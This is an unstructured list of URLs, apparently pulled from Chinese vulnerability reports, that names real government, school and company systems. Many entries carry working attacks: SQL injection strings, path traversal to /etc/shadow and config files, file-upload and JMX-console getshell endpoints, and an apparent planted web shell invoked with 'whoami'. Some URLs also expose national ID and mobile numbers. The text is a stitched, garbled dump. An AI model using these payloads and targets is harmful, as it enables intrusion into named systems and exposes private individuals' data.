http://www.fuer.lwedu.sh.cn/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx http://syxx.mhedu.sh.cn/EduPlate/GoodoBlog/ClassPhtoStuAdd.aspx举例 http://syxx.mhedu.sh.cn/Eduplate/GoodoBlog/ClassPhtoStuAll.aspx http://syxx.mhedu.sh.cn/UpLoad/Blog/blog-1_20150406235937.aspx inurl:eduplate/GoodoBlog http://www.shjzzx.com/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://www.peijia.com/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://www.mhhqyy.com/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://i.goodo.com.cn/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://218.78.210.210/goodo/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://www.pjhpedu.com/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://lczx.xhedu.sh.cn/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://shinan.hpe.sh.cn/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://syxx.mhedu.sh.cn/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://dm.goodo.com.cn/PSTQ/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://www.hsyr.pudong-edu.sh.cn/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://zpxx.nh.edu.sh.cn/eduplate/GoodoBlog/ClassPhtoAdd.aspx http://www.pslq.pudong-edu.sh.cn/goodo/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://bqxx.edu.sh.cn/eduplate/goodoblog/ClassPhtoAdd.aspx http://www.mhhlyy.com/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://www.mlzx.net/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://www.fuer.lwedu.sh.cn/EduPlate/GoodoBlog/ClassPhtoAdd.aspx http://syxx.mhedu.sh.cn/EduPlate/GoodoBlog/ClassPhtoAdd.aspx举例 http://syxx.mhedu.sh.cn/Eduplate/GoodoBlog/ClassPhtoall.aspx http://syxx.mhedu.sh.cn/UpLoad/Blog/blog-1_20150406214941.aspx http://www.nnzcw.cn/admin/login.aspx http://www.nnzcw.cn/admin/changepwd.aspx http://www.nnzcw.cn/commenapi/ http://jyz.homelink.com.cn/mypower/downloadUrl.php jyz.homelink.com.cn/mypower/Home/Product/professionallist/pid/1294/order/haopingdesc?citySun=0&CITY=%25e5%258c http://222.135.110.105:8080/gssols/login/login!check.do http://222.135.110.105:8080/gssols/login/login!check.do http://222.135.110.105:8080/gssols/login/login!check.do 
http://www.fuyin.tv/index.php/content/page/id/12 http://222.135.110.105:8080/gssols/login/login!check.do http://222.135.110.105:8080/jmx-console/ http://yf.hhedai.com/upgrade.php?m=editor&f=edit&filePath=L3Zhci93d3cvaHRtbC96ZW50YW9wbXMvL2NvbmZpZy9teS5waHA=&action=edit http://119.180.20.200:8080/ytjyc/login.do http://119.180.20.200:8080/jmx-console/ http://www.aybmw.com/ http://vote.aybm.cn/ http://vote.aybm.cn/siteserver/forgetPassword.aspx http://www.fj12333.gov.cn:268/fwpt/registerActionBefore.html https://sfglnanchong.nacao.org.cn/publish/299/index.html http://home.www2.fang.com/ http://work.fang.com https://passport.souyidai.com/password/findpassword mail.tom.com/info/ad/mailpop-dzm/adv.txt position:absolute width:530px height:530px position:absolute width:200px height:115px cursor:pointer position:absolute width:41px height:39px http://pass.tom.com/dologin.php http://f.game.tom.com/ftx/index.html http://113.57.194.131:8080/SS/userLogin.action http://113.57.194.131:8080/SS/userLogin.action http://113.57.194.131:8080/SS/userLogin.action http://www.wcb.yn.gov.cn:8080/Default.aspx http://open.zhuna.cn/g/ http://open.zhuna.cn/g/api/r_hotel/ www.ecpic.com.cn http://www.ecpic.com.cn http://work.fang.com/v2/sys/sysFileAct.do?method=download&sysfileid=787404&objId=201708&downType=2 http://work.fang.com/v2/sys/sysFileAct.do?method=downloadFileById&fileid=542009 http://work.fang.com/v2/sys/sysFileAct.do?method=toShowPic&xtype=1&objId=48504&sysfileid=643290&downType=1 http://www.moneyking.cn/admin/login.htm open.ppmoney.com/index.php/Third/Rong360/_ http://pz.ppmoney.com/admin/list/token/06b41dbb6ae9edb573ef9c5d6b6b6bf1 http://pz.ppmoney.com/admin/Stat/olist/token/a0ca130d81993cc55c1377728e96fed1 http://aqe.wyn88.com/Quickas/wefeedback/wefeedback.jsp http://aqe.wyn88.com/Quickas/login.jsp http://aqe.wyn88.com/Quickas/wefeedback/wefeedback.jsp http://www.cits.cn/member/bind.html http://www.xznsyh.com/messLook.php?id=131 http://sqlmap.org 
http://open.chrome.360.cn/extension_dev/content_scripts.html) www.oppoforums.com http://54.83.18.184:81/列目录 http://54.83.18.184:81/www.oppoforums.com/oppo.global.forum.tar.gz url:http://59.175.196.51:8080/bpmsplatform/index.jsp http://59.175.196.51:8080/jmx-console/ http://59.175.196.51:8080/invoker/JMXInvokerServlet http://gzzp.gzzypx.net/ http://gzzp.gzzypx.net/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media http://bk.sz96296.com/ http://bk.sz96296.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=* http://1.85.40.234:8080,该ip80端口对应的是 http://1.85.40.234:8080/invoker/JMXInvokerServlet,getshell http://webplus.njau.edu.cn/s/0/manage/main.jspy http://webplus.gzu.edu.cn/s/0/manage/main.jspy http://webplus.xmu.edu.cn/s/0/manage/main.jspy http://www.ouc.edu.cn/login.jsp?_p=YXM9MSZwPTEmbT1OJg__ http://www.webplus.net.cn/s/0/main.jspy https://github.com/gao715108023/memcached/blob/master/memcached-client/src/main/resources/filters/filter-product.properties jdbc:mysql://sfhaitaoqd1.mysql.rds.aliyuncs.com:3306/haitao_products_v2?useUnicode=true&characterEncoding=utf8&zeroDateTimeBehavior=convertToNull http://113.57.194.131:8080/SS/ http://113.57.194.131:8080/jmx-console http://**.**.**/XS/admin.aspx http://fengkong.gidon.cn/findpassword/getCodePage.action http://IQCD-D0049:8080/uploader/upload http://mvs-stg.pingan.com.cn:8080/uploader/upload http://10.25.32.11:8787/uploader/upload http://IQCD-D0049:8080/uploader/validateVUser http://mvs-stg.pingan.com.cn:8080/uploader/validateVUser http://10.25.32.11:8787/uploader/upload http://192.168.1.244:8088/zhengXin/remoting/hessianRemote http://203.110.164.62:8088/zhengXin/remoting/hessianRemote http://www.benbei365.com/remoting/hessianRemote jdbc:oracle:thin:@127.0.0.1:1521:orcl http://192.168.1.222:8080/upload/pic/20131124/1385306431517.png http://127.0.0.1:8080/upload/pic http://app.mapabc.com/apis?t=flashmap&v=2.4.1&key=0f7780e5262c159dc1b1fd417036071653c30e2674ff9ace22392351f16c67d281f6ad575c507b05 
http://app.mapabc.com/apis?t=flashmap&v=2.4.1&key=ad175860c5046a5365f38c1876b28f258deb68b3ea52217c3c0ff7a961de3712ef0216c89ce9a7ee http://app.mapabc.com/apis?t=flashmap&v=2.4.1&key=f6c97a7f64063cfee7c2dc2157847204d4dbf093b023619a3f7f23383d3e7fe5819c30d2f5f9fb07 http://115.29.233.153 http://app.mapabc.com/apis?t=flashmap&v=2.4.1&key=d2f4070d7464f17405922e8e73bd42d61e9ec646728b9c6e6500369e3b7d73952997ada9993d6ab0 jdbc:mysql://192.168.1.111:3306/risk_control jdbc:mysql://localhost:3306/risk_control http://www.gidon.cn/jdct/webPage/account/pay_result.jsp http://www.gidon.cn/jdct/webURechargeRecordAction_backPay.do http://www.gidon.cn jdbc:oracle:thin:@192.168.0.58:1521:orcl jdbc:sqlserver://192.168.1.144\\MSSQLSERVER:1433;databaseName=P2P_DB jdbc:mysql\://localhost:3306/sa http://admin.wcif.cn/admin/login!login.action http://www.leawe.com/case/ http://gxlx.ohdev.cn/web/ http://nbxx.ohdev.cn/web/ http://www.yqhqyz.com/web/ http://xqxx.ohdev.cn/web/ http://lasx.ohdev.cn/web/ http://www.sysxedu.net/web/ http://www.yjobwz.com/web/ http://pysyzx.pyedu.cn/web/ http://www.qxzzx.com/web/ http://www.ailu.cc/web/ http://www.rattsx.com/web/ http://www.rafygx.com/web/ http://www.raxcyx.com/web/ http://www.wzgxzx.com/web/ http://pysyzx.pyedu.cn/web/ http://www.syzx.yje.cn/Web/ http://www.wctvu.com/web/ http://pqczxx.ohdev.cn/ http://xyyx.ohdev.cn/web/ http://wtncxx.ohdev.cn/web/ http://xq.ailu.cc/web/ http://xqzxyey.ohdev.cn/web/ http://www.leawe.com/case/ http://gxlx.ohdev.cn/web/ http://nbxx.ohdev.cn/web/ http://www.yqhqyz.com/web/ http://xqxx.ohdev.cn/web/ http://lasx.ohdev.cn/web/ http://www.sysxedu.net/web/ http://www.yjobwz.com/web/ http://pysyzx.pyedu.cn/web/ http://www.qxzzx.com/web/ http://www.ailu.cc/web/ http://www.rattsx.com/web/ http://www.rafygx.com/web/ http://www.raxcyx.com/web/ http://www.wzgxzx.com/web/ http://pysyzx.pyedu.cn/web/ http://www.syzx.yje.cn/Web/ http://www.wctvu.com/web/ http://pqczxx.ohdev.cn/ http://xyyx.ohdev.cn/web/ http://wtncxx.ohdev.cn/web/ 
http://xq.ailu.cc/web/ http://xqzxyey.ohdev.cn/web/ http://system.fjjs.gov.cn/PersonManageWeb/Pages/Print.aspx?approveRecordID=704103、 http://www.snerdi.com.cn/ListInfo1.aspx?Type= http://wooyun.org/bugs/wooyun-2010-097337 http://www.bttszx.com/yemian/dangzhengshou.aspx?id=36 http://59.175.196.52:8080/html/index-6-3.htm http://59.175.196.52:8080/jmx-console/ http://61.187.7.213:9001/vip/reguserjgdm.action?button_type= http://ecampus.sysu.edu.cn/tutorapp/,然后查看:我的学生,可以查询到所有硕士/博士生的个人信息。 http://sms.tiebanshou.com/findPwd/index.action http://zwfw.ordos.gov.cn/getWebPublishContentDetail.action http://gongbao.nc.gov.cn/articleDetail.do?article_id=d8387b4e-4649-498a-b74f-0480ba8a87e6 http://gzzp.gzzypx.net/Index/artview?id=16485 http://www.jpzto.com/upload/auth_image_data/ http://w.3158.cn/main/login.html http://wenda.3158.cn/登入 http://218.70.65.72:89/taxcreditquery/register_page.action http://www.szzsb.net/indexCQB_newsDetails.action http://www.sysredcross.org.cn:8088/sysRedcross/listnews.jsp?id=1 http://218.77.183.59:9001/HAIP/register.action http://1.85.40.234/login.do http://1.85.40.234/verifyLogin.do http://1.85.40.234/login.do www.ctsho.com http://www.ctsho.com/resetPassword.html http://bbs.ctsho.com/admin.php http://222.76.218.175:9002/hrpm/positionAction!getAllPositionForIndexJob.action https://dnsapi.cn/Monitor.List https://github.com/yinwenbo/wei100/blob/076b951d8c3106c9e2c05dda4b87aa62249cc7ec/portal/portal.tenders/src/main/resources/META-INF/tenders.properties https://github.com/congpz/FutureProgramTrading/blob/4db6ae3feeb678ef436fa3244b0fff20427ace91/src/jmail/JmailTest.java http://yeyou.mop.com/payment/Alipay_Pay.aspx?code=Alipay http://yeyou.mop.com/payment/yee_mobile.aspx?code=UNICOM http://yeyou.mop.com/customer/findpass.aspx http://124.117.240.74:8001/log_Login.action http://xf.gdwst.gov.cn/letter/dspletter.jsp?instid=425&zjnum=411234564564123101&mobile=13610035411 
http://xf.gdwst.gov.cn/letter/dspletter.jsp?instid=2341&zjnum=440804197709200273&mobile=13728933522 http://xf.gdwst.gov.cn/letter/dspletter.jsp?instid=2835&zjnum=441302198812290516&mobile=13825407002 http://xf.gdwst.gov.cn/letter/dspletter.jsp?instid=3096&zjnum=441881198811112817&mobile=13418090154 http://guestbook.lib.sjtu.edu.cn/add_book.asp http://222.82.215.90:8082/index.php?m=user&f=login CC02802EC0939CA6096D750A27ED94A9:FG=1 http://www.jszzb.gov.cn:2000/news_file/2009101948386652.xls http://www.gsxfga.gov.cn/upload/2011/6/2491537531.xls http://www.qingdao.gov.cn/n172/upload/120908184100600606/140616004824958038.xls http://www.cicp.edu.cn/extra/col1/1350283902.xls http://www.cicp.edu.cn/extra/col1/1381562705.xls http://www.cicp.edu.cn/extra/col1/1304.xls filetype:xls https://s.bt.gg/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0CEUQFjAH&url=http%3a%2f%2frlzyhshbzj%2ekzzq%2egov%2ecn%2fUpload%2fOffice%2f20131029141209975%2exls&ei=VsdBVfjqLKLcmAX6yoH4Ag&usg=AFQjCNEcgBg5QO http://219.146.10.132/index!login.do http://42.96.190.138/ http://**.**.**/ http://authentication.suda.edu.cn/authentication.asmx?op=getUserName soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap12="http://www.w3.org/2003/05/soap-envelope soap12:Body http://tempuri.org/ http://111.207.203.212:81/extman/ http://222.170.20.34:8001/index!showNews.action?newsId=2c90e6e4360f33b601360fba328c0015 http://nybx.haian.gov.cn:7001/ntai/indexPubDetail.action?contentId=83 http://www.fzyb.cn:7001/fzybweb/newsList.action?zr01web.zr0004=4 http://www.hjxgtzyj.gov.cn/template/hjgtzyj/pagelist_search.jsp?fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11 http://125.93.53.228/../../../../../../../../../../../../../../../../../etc/hosts http://125.93.53.228/../../../../../../../../../../../../../../../../../etc/shadow http://125.93.53.228/../../../../../../../../../../../../../../../../..//usr/local/hexin/data/text/infodata/upload/7965.html 
http://125.93.53.228/../../../../../../../../../../../../../../../../../usr/local/hexin/conf/syncd2.ini http://deliver.10jqka.com.cn/deliver/packages/ http://125.93.53.228/../../../../../../../../../../../../../../../../../usr/local/hexin/syncfile/system.xml http://www.huafi.com/ http://www.hnaf120.com/admin/login.aspx http://www.meigedianqi.com/admin/login.aspx http://www.wenjiao.cn/admin/login.aspx http://www.dextt.com/admin/login.aspx http://www.hfxseeds.com/admin/login.aspx http://www.shdrb.com/admin/login.aspx http://www.jckmgs.com/admin/login.aspx http://www.yfntsb.com/admin/login.aspx http://www.hggfj.com/admin/login.aspx http://www.runhe168.com/admin/login.aspx http://www.zzxfdz.com/admin/login.aspx http://www.bst-dz.com/admin/login.aspx http://www.zgfywh.com/admin/login.aspx http://zzdhcq.com/admin/login.aspx http://www.xiangyuanmenye.com/admin/login.aspx http://www.hnsxyt.com/admin/login.aspx http://www.shilifujian.com/admin/login.aspx http://www.zzmxkt.com/admin/login.aspx http://www.greehn.com.cn/admin/login.aspx http://www.huafi.cn/admin/login.aspx http://www.hgblower.com/admin/login.aspx http://www.hnaf120.com/admin/login.aspx https://github.com/opensource-kisszpy/apps/blob/a3dd98ece652db367a75eddf3616e82888fbcd76/app-sns/src/main/filter/dev.properties http://www.59store.com/.git http://www.59store.com/.git/ http://**.**.**/ http://zcweb.jrjkg.com.cn/Upload/DownLoadFile.aspx?DocGUID=b5cfc484-a80a-4b9f-93f6-112de03fb639 demo:eisdemo.landray.com.cn http://eisdemo.landray.com.cn/webdoc/file_download.aspx?guid=19e789719ac343679c070110c147290e http://eisdemo.landray.com.cn/webdoc/file_show.aspx?id=1 http://eisdemo.landray.com.cn/webdoc/HtmlSignatureServer.aspx?DocumentID=1'&SignatureID=1&Signature=1&COMMAND=SHOWSIGNATURE http://eisdemo.landray.com.cn/vote/service.aspx post:action=voteid&ID=1 http://eisdemo.landray.com.cn/sm/bulkinsert_data.aspx?id=1 http://eisdemo.landray.com.cn/sm/data_manager_right_edit.aspx?tableid=1 
http://eisdemo.landray.com.cn/sm/DictKey.aspx?DictKey=1 http://bbs.dakele.com/plugin.php?id=nds_up_ques:nds_ques_viewanswer&srchtxt=1&orderby=dateline%20and%201=%28updatexml%281,concat%280x27,version%28%29%29,1%29%29-- http://sdgree.grirms.com:80/ http://www.tgc100.com/portal/news_photoView.action http://www.idc34.com/mainAction!main.action http://122.224.232.157:2010/news/nlk3/marketNewsList.action http://www.zdqh.com/) http://avicuniversity.com/loginAction!login.action http://www.keto.com.cn/system/updateSufUserpwd.action http://gts.s-view.com/gtsel/system/users!toRegister.action http://faq.intersecnet.com/system/system!openRegister.action http://220.179.121.10:8001/house/chart/init.action http://wenhuayn.com/logon.action www.ynwh.net\ http://user.chinaiiss.com http://app.zhcw.com/wwwroot/zhcw/jsp/do3dsjhdc http://sqlmap.org http://fuzhou.mop.com/.svn/entries http://huhehaote.mop.com/.svn/entries http://qz.mop.com/.svn/entries http://xuzhou.mop.com/.svn/entries http://www2.qglt.com.cn/wsrmlt/ly/2.txt http://pj.chinacses.org.cn/corpration/toreg.action http://pj.chinacses.org.cn/ http://pj.chinacses.org.cn/corpration/tomodifypass.action http://blog.vasee.com/.svn/entries http://210.75.213.221/lespweb/ https://auth.gf.com.cn/.git/config inurl:Public/project/ProjectInfo.aspx http://61.184.82.181:8088/Public/project/Projec http://sqlmap.org http://mail.scti.cn/webmail/login9.php www.digilinx.net http://xiu.pps.tv/ http://jiankang.baidu.com/juhe/index?qid=0&pssid=0&pvid=1430389032461841835&tn=NONE&zt=self&wd=&key=人流&aType=14 http://zhixin.baidu.com/My/Index?module=onesite&from=zhixin#health http://m.robam.com/2c1.php?classid=1 http://t.10jqka.com.cn/ucenter/settings/profile http://www.salala.com.cn/liuyan/index.php?page=2&search=1中的search参数,具体如下所示: http://www.salala.com.cn/liuyan/index.php?page=2&search=1 http://sqlmap.org http://app.zhcw.com/wwwroot/zhcw/jsp/gglPK.jsp http://sqlmap.org http://210.44.112.101/servlet/FileUpload?fileName=t.jsp&actionID=update 
http://210.44.112.101/R9iPortal/upload/t.jsp http://210.44.112.101/servlet/FileUpload http://124.128.96.98:8001/servlet/FileUpload http://61.139.105.105:8008/servlet/FileUpload http://125.67.66.250:801/servlet/FileUpload http://210.41.128.120:8002/servlet/FileUpload http://zfbz.jljsw.gov.cn/xzzf/ URL:http://www.szahotel.com/cn/media/news.aspx?keyword=1 URL:http://www.szahotel.com/cn/member/Order.aspx?Email=TEST@sina.com&OrderNo=1 http://60.172.2.211:8081/ http://www.fyzcgl.com/ http://218.22.115.165:8011/ http://www.fyyqqgz.com/ http://zcgl.yscz.gov.cn:8001/ http://220.180.150.228/ http://www.lqzcgl.com/ http://218.22.114.166:8011/ http://www.fyzcgl.com/fygx/ http://zc100.com/ http://www.fnzcgl.com/ http://zc.mas.gov.cn:8080/ http://zc.yyxcz.gov.cn:81/ https://www.igreenjsq.info/openvpn/.bash_history https://www.igreenjsq.info/openvpn/openvpn.zip soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/ xmlns:ser="http://service.pt.midas.ufgov.com soapenv:Header/ soapenv:Body ser:getAllUserName soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/ xsi:type="xsd:string ser:getAllUserName soapenv:Body soapenv:Envelope http://210.44.112.101/login.jsp http://210.44.112.101/services/userInfoWeb?wsdl http://124.128.96.98:8001/services/userInfoWeb?wsdl http://61.139.105.105:8008/services/userInfoWeb?wsdl http://125.67.66.250:801/services/userInfoWeb?wsdl http://210.41.128.120:8002/services/userInfoWeb?wsdl http://classzone.ciwong.com/1829627/Member http://classzone.ciwong.com/1829628/Member http://lab.njnu.edu.cn/login.asp http://wooyun.org/bugs/wooyun-2010-025480 http://oa.ucredit.com/login/Login.jsp github.com/richard0147/mysite/blob/bc8b53f0c5d6c9cad5273cd81be69c11afcea042/reports/views.py http://111.11.181.192:8071/customdev_app/app/hotApp/query.action.com http://3g.i.xywy.com/index/login 
http://www.zjgldrk.cn/epointframe_zjgzg/temporarystay_new/taizhang/people2_detail.aspx?peopleguid=63923f53-0b15-46dd-8299-1c7563973889 http://www.zjgldrk.cn/epointframe_zjgzg/ http://www.zjgldrk.cn/epointframe_zjgzg/20130827_renyuan.rar http://wooyun.org/bugs/wooyun-2015-096948 http://bbs.chinaunix.net/member.php?mod=logging&action=login&logsubmit=yes http://baike.anjuke.com/index.php http://svip.fang.anjuke.com/login http://uctest.ucweb.com:81/wml/Download/Upload/wap2upload.xhtml http://www.h-h.com.cn/visa/view_visa.aspx?id=17,查看签证服务信息,如图所示: http://sqlmap.org http://oa.lytv.tv:8080/Admin/login.jsp http://www.ichengyo.com/ http://user.anjian.com/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2%20union%20select%201,2,3,4,5,concat%280x7e,user%28%29,0x7e,0x5430304C5320474F21,0x7e%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23 http://zy.anjian.com//batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2%20union%20select%201,2,3,4,5,concat%280x7e,user%28%29,0x7e,0x5430304C5320474F21,0x7e%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23 http://unbank.info/toFindBankNodeJsp.action www.unbank.info/loginmain.action www.unbank.info/loginmain.action www.unbank.info/loginmain.action www.unbank.info/loginm.action?type\={0 www.unbank.info/loginm.action?type\={0 http://erya.tsk.erya100.com/teacherLogin http://mc.erya100.com/teacherLogin http://weixin.js.sgcc.com.cn/alipay_web/wx/initSecdCapture.do?consno=8813714511&qd=alipay&openid= http://hrm.cqccn.com/ http://fxr.shandongbusiness.gov.cn:81/safepork/login.action http://**.**.**/ http://baike.anjuke.com/index.php?title=%E7%89%B9%E6%AE%8A:%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95&returnto=%E9%A6%96%E9%A1%B5别的权限没注意,可是拥有上传权限,所以 http://www.xunje.com/jiemian.htm http://112.85.215.186/4/album.aspx?albumClass=%B9%FA%CD%E2%C3%F7%D0%C7 http://218.22.185.18:8000/5/album.aspx?albumClass=%B9%FA%CD%E2%C3%F7%D0%C7 http://218.31.50.45:81/4/album.aspx?albumClass=%B9%FA%CD%E2%C3%F7%D0%C7 
http://60.207.233.250/5/album.aspx?albumClass=%B9%FA%CD%E2%C3%F7%D0%C7 url:http://www.haier.grirms.com/com.grandison.grirms.phone.web-1.0.0/upPayResult.do https://219.148.162.112/server-status http://www.sitestar.cn/member/change.aspx?ctm=MjAxNS81LzIgMTU6MTA6MzY=&un=ODMxNjY4N0BxcS5jb20=&up=cb16979fd5ba7497bbcec4b1157aad11 http://www.sitestar.cn/member/change.aspx?ctm=2015/5/2 http://www.sitestar.cn/member/change.aspx?ctm=MjAxNS81LzIgMTU6NDU6NTA=&un=MTIxOTg4NjQ5OEBxcS5jb20=&up=cb16979fd5ba7497bbcec4b1157aad11 www.qingcheng.com http://www.qingcheng.com:80/ www.qingcheng.com http://www.wisesz.com/news/down-iphone/down-iphone.shtml然后我就下载了测试一下 http://content.2500city.com/dbadmin/ http://adm.anjuke.com/ http://localhost:8080/login.action http://adm.anjuke.com/login.action http://rsks.mwr.gov.cn/zcxxfw/xxfw/portal/xwgl!findFen.do?pageNow=1&pageSize=20&type=5 http://bioinfo.au.tsinghua.edu.cn/member/fzeng/data/FuseVariantCall/.git/config http://www.ui.cn/gkk/.svn/entries http://www.ui.cn/data/magazine/.svn/entries http://old.ui.cn/manifesto/.svn/entries http://42.62.78.136:88/zhuzhan http://42.62.78.136:88/www http://old.ui.cn/admin/ http://**.**.**/site/downloadFile.action http://118.186.66.235:8080/ http://free.3v.do/reg.html注册一个域名,并添加: www.safedog.cn www.safedog.cn http://www.ihchina.cn/fullTextIndex.action http://**.**.**/tzmszj/admin/fileUpload-downloadTAnnex.action http://eip.hongfa.cn:7001/eip/login.action http://www.myuios.com/source/plugin/tools/tools.php http://dygl.lnparty.com/loginnew.action http://edu.aisino.com/ilearn/en/learner/jsp/dxc/gonggao/viewgg.jsp?id=48 http://mps.aisino.com/ http://mps.aisino.com/merchant_archives/merchantarchives.cmd?reqCode=findArchiveMerchant https://intouch.huawei.com:6510 http://ah.189.cn/sso/login?returnUrl=%2Fservice%2Faccount%2Finit.action http://ah.vnet.cn/userPortal/index.jsp http://shangbao.xyqyw.gov.cn:90/front/login!login1.action http://www.bit-service.com/ 
http://222.160.140.206/tt/bit-xxzs/xmlpzs/buildingRooms.asp?stanid=1647&realtypeid=&maintable=realnetsubscribe&bustype=164701&businessid=1092319&mainno=103691&showMode=2&editflag=show&buildId=22972 http://www.zzfcj.com.cn:9080/xmlpzs/buildingRooms.asp?stanid=1647&realtypeid=&maintable=realnetsubscribe&bustype=164701&businessid=1092319&mainno=330418&showMode=2&editflag=show&buildId=43837 http://www.snfgj.cn/tt/snxxzs/xmlpzs/buildingRooms.asp?stanid=1647&realtypeid=&maintable=realnetsubscribe&bustype=164701&businessid=1092319&mainno=209810&showMode=2&editflag=show&buildId=13406 http://123.7.180.231/bit-xxzs/xmlpzs/buildingRooms.asp?stanid=1647&realtypeid=&maintable=realnetsubscribe&bustype=164701&businessid=1092319&mainno=758659&showMode=2&editflag=show&buildId=34204 http://www.jyzzfdc.cn/bit-xxzs/xmlpzs/buildingRooms.asp?stanid=&mainno=78322&activeid=1091629&editflag=&reftype=activeComb&actType=1&permitMode=&buildId=4823 http://www.biaochi.com.cn/ http://42.120.7.132/Educational/Register.aspx?clientid=uName&uName=xxxaaa http://222.134.129.66:800/Educational/Register.aspx?clientid=uName&uName=xxxaaa http://study.qht-training.com.cn/Educational/Register.aspx?clientid=uName&uName=xxxaaa http://oa.jcbpo.com:8088/Educational/Register.aspx?clientid=uName&uName=xxxaaa http://xt.bjn3cc.com/Educational/Register.aspx?clientid=uName&uName=xxxaaa http://www.bjuan.cn/front/login/resetPassword.action http://yxxnfz.ntu.edu.cn/virtual/zd_indexZdlistDetail.action http://jcxnfz.ahmu.edu.cn//virtual/zd_indexZdlistDetail.action http://virlab.shutcm.edu.cn/virtual/zd_indexZdlistDetail.action http://vl-study.shsmu.edu.cn:8080/virtual/shouye.action http://jxsyzx.shutcm.edu.cn:8080/virtual/shouye.action http://vecb.ccnu.edu.cn/virtual/shouye.action http://e-lab.cmc.edu.cn/virtual/shouye.action http://xnfz.szu.edu.cn/virtual/shouye.action http://xnsys.immu.edu.cn/virtual/shouye.action http://mvl.sdu.edu.cn/virtual/shouye.action 
http://zcweb.jrjkg.com.cn/Upload/DownLoadFile.aspx?DocGUID=b5cfc484-a80a-4b9f-93f6-112de03fb639 http://api.news18a.com/html/mini/my.html https://x.x.x.x/VRVEIS/MaintenanceAndTools/DownloadCommon.aspx?pathTemp=../web.config http://wooyun.org/bugs/wooyun-2015-0109607 http://bbs.chexun.com/shop_list.php?catid=27&mod=cat http://e.kesion.com/model/view.aspx?m_id=3&id=4373 http://e.kesion.com/model/view.aspx?m_id=3&id=4373 http://**.**.**/admin/login_login.action_ http://**.**.**/admin/login_login.action_ http://**.**.**/admin/login_login.action_ http://**.**.**/admin/login_login.action_ http://**.**.**/admin/login_login.action_ http://**.**.**/admin/login_login.action_ http://**.**.**/admin/login_login.action_ http://**.**.**/admin/login_login.action_ http://**.**.**/admin/login_login.action_ http://**.**.**/admin/login_login.action_ http://**.**.**/portal/login_init.action URL:http://www.xdwy.com.cn/iv.asp?T=Info&iv1=%C3%90%C3%82%C3%8E%C3%85%C2%B9%C2%AB%C2%B8%C3%A6&iv2=&iv3=&ID=700 http://www.fhyx.com/getkey/old.html http://www.fhyx.com/ http://www.frxinzhong.cn/vc2003/login/regist.htm http://www.gzsjpzx.com/vc2003/login/regist.htm http://xw.wwswz.net:81/vc2003/login/regist.htm http://www.zz1z.net/vc2003/login/regist.htm http://www.ayxlgzz.com/vc2003/login/regist.htm http://59.46.39.211/vc2003/login/regist.htm http://www.tlzz.com/vc2003/login/regist.htm http://222.87.3.82/vc2003/login/regist.htm http://www.tlzz.com/vc2003/login/regist.htm做演示 www.tlzz.com http://www.tlzz.com http://www.enet.com.cn/server/inforcenter/search.jsp?page=1&ccid=6093 http://**.**.**//FrameSet/Login.aspx http://shop.ehuatai.com/ http://shop.ehuatai.com/zecmd/zecmd.jsp?comment=whoami http://www.bjprd.com.cn/index.asp http://www.bjprd.com.cn/ http://zcc.nenu.edu.cn/ http://202.197.61.13/ http://202.113.128.61/ http://202.116.0.158/ http://brandbase.mama.cn/friso.php?forumid=122&mod=thread http://p.id5.cn:8080/Login/doLogin.do cn:8888/login/login!validateUser.action 
http://www.daimayi.com/data/member_img/55459b84ec536.gif/.php http://2012.songtaste.com/st/login.shtml这个接口,应该是一个老的登录接口,发现登录的时候没有任何限制 http://183.60.47.36:8080 http://183.60.47.36:8080 http://free.3v.do/reg.html注册2个免费空间 http://game.cntv.cn/,首页登陆的地方没有验证码机制 http://tuchong.com/login这个接口,也就是主站的登陆接口,没有任何登陆防护设置 http://www.letao.com/wap/app_download.aspx?bid=12%20and%20user%3E00--&op=brand&enable_cookie=True http://legend.7daysinn.cn/Login.aspx,这个接口,找个7天的洞不容易啊- http://mall.jia.com/gys/get_ab_order?orderGroupId=3461444 http://try.mama.cn/admin/index.php http://www.5757car.com/review.php?id=70 http://wooyun.org/bugs/wooyun-2015-0111750/trace/605ab6f7e8d7c86462fde3e77197a9d5 http://www.sz.csg.cn/front/osWireEmailDetail.jhtml?channelCode=osWireEmailDetail&opbel=WEm5K2FX7O57dmcGqJydX1zZ06ZipJr4OQgdzzpTYkg=&SubOpbel=0 http://www.tcqzw.gov.cn/ http://www.tcqzw.gov.cn/admin/Index.asp https://github.com/liyaopinner/ShopHelpper/blob/bcc8e4a98bea70c7c4c7c4e15b71c9f36505d38a/ProjectAdmin/settings.py http://www.pinpaibao.com.cn/ IP:223.203.209.201 Port:6379 IP:223.203.209.204 Port:6379 IP:223.203.209.203 Port:6379 IP:223.203.209.202 Port:6379 http://workflow.weichuan.com.cn/jmx-console/,没有设置访问密码,可以远程部署shell http://www.gdecc.cn/cn/search.aspx?key=1 http://epaper.lbwbw.com/date_panel.aspx?PaperType=esrb http://epaper.lnd.com.cn/date_panel.aspx?PaperType=esrb http://eswb.esznews.com/date_panel.aspx?PaperType=esrb 